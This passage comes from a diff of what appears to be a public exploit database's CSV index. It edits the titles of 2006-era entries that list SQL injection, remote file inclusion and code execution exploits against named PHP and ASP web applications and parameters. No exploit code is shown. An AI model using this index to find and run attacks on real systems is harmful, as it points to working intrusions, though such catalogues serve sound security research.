'rollid' SQL Injection",2006-02-17,RusH,php,webapps,0 -1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution",2006-02-17,RusH,php,webapps,0 +1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Remote Code Execution",2006-02-17,RusH,php,webapps,0 1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps,0 1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0 @@ -16832,7 +16833,7 @@ id,file,description,date,author,platform,type,port 1533,platforms/php/webapps/1533.php,"4Images 1.7.1 - Local File Inclusion / Remote Code Execution",2006-02-26,rgod,php,webapps,0 1538,platforms/php/webapps/1538.pl,"Farsinews 2.5 - Directory Traversal Arbitrary 'users.db' Access Exploit",2006-02-28,Hessam-x,php,webapps,0 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) 1.03 - 'misc.php' SQL Injection",2006-02-28,Devil-00,php,webapps,0 -1541,platforms/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - 'itemID' Parameter Remote Code Execution",2006-03-01,str0ke,php,webapps,0 +1541,platforms/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution",2006-03-01,str0ke,php,webapps,0 1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)",2006-03-01,LorD,php,webapps,0 1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - 'cookie' Final SQL Injection (mq=off)",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection",2006-03-01,nukedx,php,webapps,0 @@ -16845,14 +16846,14 @@ id,file,description,date,author,platform,type,port 1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod - (load) SQL Injection",2006-03-06,SkOd,php,webapps,0 1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - (xrms_file_root) Code Execution",2006-03-07,rgod,php,webapps,0 1562,platforms/asp/webapps/1562.pl,"CilemNews System 1.1 - 'yazdir.asp' haber_id SQL Injection",2006-03-07,nukedx,asp,webapps,0 -1563,platforms/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - 'itemID' Parameter Remote Code Execution (Metasploit)",2006-03-07,sirh0t,php,webapps,0 +1563,platforms/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)",2006-03-07,sirh0t,php,webapps,0 1566,platforms/php/webapps/1566.php,"Gallery 2.0.3 - stepOrder[] Remote Commands Execution Exploit",2006-03-08,rgod,php,webapps,0 1567,platforms/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,php,webapps,0 1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - (memName) SQL Injection",2006-03-09,DevilBox,asp,webapps,0 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0 1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - Create Authentication Bypass Remote Exploit",2006-03-09,nukedx,asp,webapps,0 1575,platforms/php/webapps/1575.pl,"Guestbook Script 1.7 - (include_files) Remote Code Execution",2006-03-11,rgod,php,webapps,0 -1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting",2006-03-11,Nomenumbra,php,webapps,0 +1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Nomenumbra,php,webapps,0 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0 1585,platforms/php/webapps/1585.php,"PHP iCalendar 2.21 - 'cookie' Remote Code Execution",2006-03-15,rgod,php,webapps,0 1586,platforms/php/webapps/1586.php,"PHP iCalendar 2.21 - 'publish.ical.php' Remote Code Execution",2006-03-15,rgod,php,webapps,0 @@ -16862,7 +16863,7 @@ id,file,description,date,author,platform,type,port 1590,platforms/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - 'savesettings.php' Remote Code Execution",2006-03-18,DarkFig,php,webapps,0 1594,platforms/php/webapps/1594.py,"SoftBB 0.1 - (mail) Blind SQL Injection",2006-03-19,LOTFREE,php,webapps,0 1595,platforms/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0 -1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - 'downloadid' Parameter SQL Injection",2006-03-20,nukedx,asp,webapps,0 +1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - 'downloadid' SQL Injection",2006-03-20,nukedx,asp,webapps,0 1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - 'images.php' Remote Code Execution",2006-03-21,x128,php,webapps,0 1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - (upload) Remote Command Execution",2006-03-22,rgod,php,webapps,0 1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution",2006-03-25,rgod,php,webapps,0 @@ -16912,14 +16913,14 @@ id,file,description,date,author,platform,type,port 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0 1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - '/inc/start.php _COOKIE' SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0 1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - 'event.php' Remote File Inclusion",2006-04-17,botan,php,webapps,0 -1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0 +1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0 1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0 1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - 'feed' Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - 'Haberler.asp' SQL Injection",2006-04-19,nukedx,asp,webapps,0 1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution",2006-04-20,rgod,php,webapps,0 -1704,platforms/php/webapps/1704.pl,"CoreNews 2.0.1 - 'userid' Parameter SQL Injection",2006-04-21,nukedx,php,webapps,0 +1704,platforms/php/webapps/1704.pl,"CoreNews 2.0.1 - 'userid' SQL Injection",2006-04-21,nukedx,php,webapps,0 1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0 1706,platforms/php/webapps/1706.txt,"dForum 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System 7.0 - Remote Code Execution",2006-04-22,nukedx,php,webapps,0 @@ -16940,11 +16941,11 @@ id,file,description,date,author,platform,type,port 1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0 1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps,0 1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0 -1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution",2006-05-02,rgod,php,webapps,0 +1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Remote Command Execution",2006-05-02,rgod,php,webapps,0 1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3/2.3.8 - 'show.php' Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0 1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0 1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 -1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' Parameter SQL Injection",2006-05-05,[Oo],php,webapps,0 +1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],php,webapps,0 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion",2006-05-05,IGNOR3,php,webapps,0 1753,platforms/php/webapps/1753.txt,"TotalCalendar 2.30 - (inc) Remote File Inclusion",2006-05-05,Aesthetico,php,webapps,0 1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0 @@ -16958,7 +16959,7 @@ id,file,description,date,author,platform,type,port 1766,platforms/php/webapps/1766.pl,"Claroline E-Learning 1.75 - 'ldap.inc.php' Remote File Inclusion",2006-05-08,beford,php,webapps,0 1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server 8.23 - 'rf' Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0 1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro 6.88 - 'rf' Remote File Inclusion",2006-05-08,ReZEN,php,webapps,0 -1769,platforms/php/webapps/1769.txt,"phpListPro 2.01 - Multiple Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0 +1769,platforms/php/webapps/1769.txt,"phpListPro 2.01 - Multiple Remote File Inclusions",2006-05-08,Aesthetico,php,webapps,0 1773,platforms/php/webapps/1773.txt,"phpRaid 3.0.b3 - 'phpBB'/'SMF' Remote File Inclusion",2006-05-09,"Kurdish Security",php,webapps,0 1774,platforms/php/webapps/1774.txt,"pafileDB 2.0.1 - 'mxBB'/'phpBB' Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0 1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0 @@ -16968,9 +16969,9 @@ id,file,description,date,author,platform,type,port 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - 'cart_content.php' Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 -1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - 'name' Parameter SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0 +1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - 'name' SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0 1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 -1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' Parameter SQL Injection",2006-05-16,rgod,php,webapps,0 +1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' SQL Injection",2006-05-16,rgod,php,webapps,0 1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - 'Attachment mod_mime' Remote Exploit",2006-05-16,rgod,php,webapps,0 1798,platforms/php/webapps/1798.txt,"Quezza BB 1.0 - 'quezza_root_path' File Inclusion",2006-05-17,nukedx,php,webapps,0 1800,platforms/php/webapps/1800.txt,"ScozNews 1.2.1 - 'mainpath' Remote File Inclusion",2006-05-17,Kacper,php,webapps,0 @@ -16984,7 +16985,7 @@ id,file,description,date,author,platform,type,port 1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps,0 1814,platforms/php/webapps/1814.txt,"UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - (DIR_LIBS) Remote File Inclusion",2006-05-23,rgod,php,webapps,0 -1817,platforms/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusion",2006-05-23,Kacper,php,webapps,0 +1817,platforms/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusions",2006-05-23,Kacper,php,webapps,0 1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Multiple (Cross-Site Scripting / SQL Injection) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 1821,platforms/php/webapps/1821.php,"Drupal 4.7 - (attachment mod_mime) Remote Exploit",2006-05-24,rgod,php,webapps,0 1823,platforms/php/webapps/1823.txt,"BASE 1.2.4 - melissa (Snort Frontend) Remote File Inclusion",2006-05-25,str0ke,php,webapps,0 @@ -17004,7 +17005,7 @@ id,file,description,date,author,platform,type,port 1840,platforms/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,asp,webapps,0 1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting",2006-05-28,nukedx,php,webapps,0 1842,platforms/php/webapps/1842.htm,"EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,php,webapps,0 -1843,platforms/php/webapps/1843.txt,"UBBCentral UBB.Threads 5.x/6.x - Multiple Remote File Inclusion",2006-05-28,nukedx,php,webapps,0 +1843,platforms/php/webapps/1843.txt,"UBBCentral UBB.Threads 5.x/6.x - Multiple Remote File Inclusions",2006-05-28,nukedx,php,webapps,0 1844,platforms/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion",2006-05-28,nukedx,php,webapps,0 1845,platforms/asp/webapps/1845.txt,"ASPSitem 2.0 - SQL Injection / Database Disclosure",2006-05-28,nukedx,asp,webapps,0 1846,platforms/php/webapps/1846.txt,"Blend Portal 1.2.0 - 'phpBB Mod' Remote File Inclusion",2006-05-28,nukedx,php,webapps,0 @@ -17065,15 +17066,15 @@ id,file,description,date,author,platform,type,port 1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - 'destination' File Inclusion",2006-06-14,Kacper,php,webapps,0 1913,platforms/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - 'template.php' File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 -1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Parameter Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0 +1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0 1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 -1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion",2006-06-16,K-159,php,webapps,0 +1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Remote File Inclusion",2006-06-16,K-159,php,webapps,0 1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0 1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0 1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - 'Weblinks' Blind SQL Injection",2006-06-17,rgod,php,webapps,0 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps,0 1925,platforms/php/webapps/1925.txt,"Indexu 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 -1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Parameter Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0 +1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0 1928,platforms/php/webapps/1928.txt,"IdeaBox 1.1 - (gorumDir) Remote File Inclusion",2006-06-19,Kacper,php,webapps,0 1929,platforms/php/webapps/1929.txt,"Micro CMS 0.3.5 - (microcms_path) Remote File Inclusion",2006-06-19,CeNGiZ-HaN,php,webapps,0 1930,platforms/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - SQL Injection",2006-06-19,EntriKa,asp,webapps,0 @@ -17096,22 +17097,22 @@ id,file,description,date,author,platform,type,port 1953,platforms/php/webapps/1953.pl,"DeluxeBB 1.07 - Remote Create Admin",2006-06-25,Hessam-x,php,webapps,0 1954,platforms/php/webapps/1954.pl,"DreamAccount 3.1 - 'auth.api.php' Remote File Inclusion",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 1955,platforms/php/webapps/1955.txt,"Mambo Module CBSms 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0 -1956,platforms/php/webapps/1956.txt,"Mambo Component Pearl 1.6 - Multiple Remote File Inclusion",2006-06-27,Kw3[R]Ln,php,webapps,0 -1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - 'forumid' Parameter SQL Injection",2006-06-27,simo64,php,webapps,0 +1956,platforms/php/webapps/1956.txt,"Mambo Component Pearl 1.6 - Multiple Remote File Inclusions",2006-06-27,Kw3[R]Ln,php,webapps,0 +1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - 'forumid' SQL Injection",2006-06-27,simo64,php,webapps,0 1959,platforms/php/webapps/1959.txt,"RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion",2006-06-28,marriottvn,php,webapps,0 1960,platforms/php/webapps/1960.php,"Blog:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - 'lid' SQL Injection",2006-06-28,KeyCoder,php,webapps,0 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps,0 1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) 1.34 - 'id' SQL Injection",2006-07-01,x128,php,webapps,0 -1969,platforms/php/webapps/1969.txt,"Stud.IP 1.3.0-2 - Multiple Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps,0 +1969,platforms/php/webapps/1969.txt,"Stud.IP 1.3.0-2 - Multiple Remote File Inclusions",2006-07-01,"Hamid Ebadi",php,webapps,0 1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 - 'dbinstall.php' Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps,0 1971,platforms/php/webapps/1971.txt,"Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion",2006-07-01,OLiBekaS,php,webapps,0 -1974,platforms/php/webapps/1974.txt,"SmartSite CMS 1.0 - (root) Multiple Remote File Inclusion",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 +1974,platforms/php/webapps/1974.txt,"SmartSite CMS 1.0 - 'root' Multiple Remote File Inclusions",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - (where) SQL Injection",2006-07-02,x23,php,webapps,0 1981,platforms/php/webapps/1981.txt,"Mambo Module galleria 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,php,webapps,0 -1983,platforms/php/webapps/1983.txt,"MyPHP CMS 0.3 - 'domain' Parameter Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps,0 +1983,platforms/php/webapps/1983.txt,"MyPHP CMS 0.3 - 'domain' Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps,0 1987,platforms/asp/webapps/1987.txt,"Hosting Controller 6.1 Hotfix 3.1 - Privilege Escalation",2006-07-06,"Soroush Dalili",asp,webapps,0 1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution",2006-07-07,rgod,php,webapps,0 1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure",2006-07-07,rgod,php,webapps,0 @@ -17123,7 +17124,7 @@ id,file,description,date,author,platform,type,port 2003,platforms/php/webapps/2003.txt,"SQuery 4.5 - 'gore.php' Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0 2007,platforms/php/webapps/2007.php,"phpBB 3 - 'memberlist.php' SQL Injection",2006-07-13,rgod,php,webapps,0 2008,platforms/php/webapps/2008.php,"Phorum 5 - 'pm.php' Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0 -2009,platforms/php/webapps/2009.txt,"CzarNews 1.14 - 'tpath' Parameter Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0 +2009,platforms/php/webapps/2009.txt,"CzarNews 1.14 - 'tpath' Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 < 2.1.6 - SQL Injection (1)",2006-07-14,RusH,php,webapps,0 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) 1.1.5 - 'CLIENT-IP' SQL Injection",2006-07-15,rgod,php,webapps,0 2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - 'class.rich.php' Remote File Inclusion",2006-07-16,igi,php,webapps,0 @@ -17146,7 +17147,7 @@ id,file,description,date,author,platform,type,port 2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0 2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 -2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Parameter Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 +2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0 2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0 2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - (page) Remote File Inclusion",2006-07-23,CyberLord,php,webapps,0 @@ -17173,7 +17174,7 @@ id,file,description,date,author,platform,type,port 2097,platforms/php/webapps/2097.txt,"NewsLetter 3.5 - (NL_PATH) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2098,platforms/php/webapps/2098.txt,"TSEP 0.942 - 'copyright.php' Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 2099,platforms/php/webapps/2099.txt,"WoW Roster 1.5.1 - (subdir) Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 -2100,platforms/php/webapps/2100.txt,"phpAuction 2.1 - 'phpAds_path' Parameter Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 +2100,platforms/php/webapps/2100.txt,"phpAuction 2.1 - 'phpAds_path' Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 2101,platforms/php/webapps/2101.txt,"newsReporter 1.1 - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 2102,platforms/php/webapps/2102.txt,"Voodoo chat 1.0RC1b - (file_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 @@ -17188,7 +17189,7 @@ id,file,description,date,author,platform,type,port 2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0 2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections",2006-08-07,rgod,php,webapps,0 2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 -2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 +2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0 2122,platforms/php/webapps/2122.txt,"ME Download System 1.3 - 'header.php' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - 'tpl.inc.php' Remote File Inclusion",2006-08-07,SirDarckCat,php,webapps,0 @@ -17242,7 +17243,7 @@ id,file,description,date,author,platform,type,port 2187,platforms/php/webapps/2187.htm,"WEBInsta MM 1.3e - 'absolute_path' Remote File Inclusion",2006-08-15,str0ke,php,webapps,0 2188,platforms/php/webapps/2188.txt,"Discloser 0.0.4 - (fileloc) Remote File Inclusion",2006-08-15,"Arash RJ",php,webapps,0 2189,platforms/php/webapps/2189.txt,"WEBInsta CMS 0.3.1 - 'users.php' Remote File Inclusion",2006-08-15,Yns,php,webapps,0 -2190,platforms/php/webapps/2190.txt,"PHProjekt 5.1 - Multiple Remote File Inclusion",2006-08-15,Kacper,php,webapps,0 +2190,platforms/php/webapps/2190.txt,"PHProjekt 5.1 - Multiple Remote File Inclusions",2006-08-15,Kacper,php,webapps,0 2191,platforms/php/webapps/2191.txt,"dotProject 2.0.4 - 'baseDir' Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 2192,platforms/php/webapps/2192.txt,"OPT Max 1.2.0 - (CRM_inc) Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 2196,platforms/php/webapps/2196.txt,"Mambo Component CopperminePhotoGalery - Remote File Inclusion",2006-08-16,k1tk4t,php,webapps,0 @@ -17277,7 +17278,7 @@ id,file,description,date,author,platform,type,port 2230,platforms/asp/webapps/2230.txt,"LBlog 1.05 - 'comments.asp' SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 2231,platforms/php/webapps/2231.php,"Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Remote Exploit",2006-08-20,rgod,php,webapps,0 2232,platforms/php/webapps/2232.pl,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)",2006-08-20,ASIANEAGLE,php,webapps,0 -2235,platforms/php/webapps/2235.txt,"PHProjekt 6.1 - (path_pre) Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 +2235,platforms/php/webapps/2235.txt,"PHProjekt 6.1 - 'path_pre' Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps,0 2236,platforms/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - 'folderprops.php' Remote File Inclusion (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - 'checklevel.php' Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0 2240,platforms/php/webapps/2240.txt,"HPE 1.0 - (HPEinc) Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0 @@ -17291,10 +17292,10 @@ id,file,description,date,author,platform,type,port 2253,platforms/php/webapps/2253.php,"Phaos 0.9.2 - 'basename()' Remote Command Execution",2006-08-24,Kacper,php,webapps,0 2254,platforms/php/webapps/2254.txt,"PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion",2006-08-24,Timq,php,webapps,0 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0 -2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' 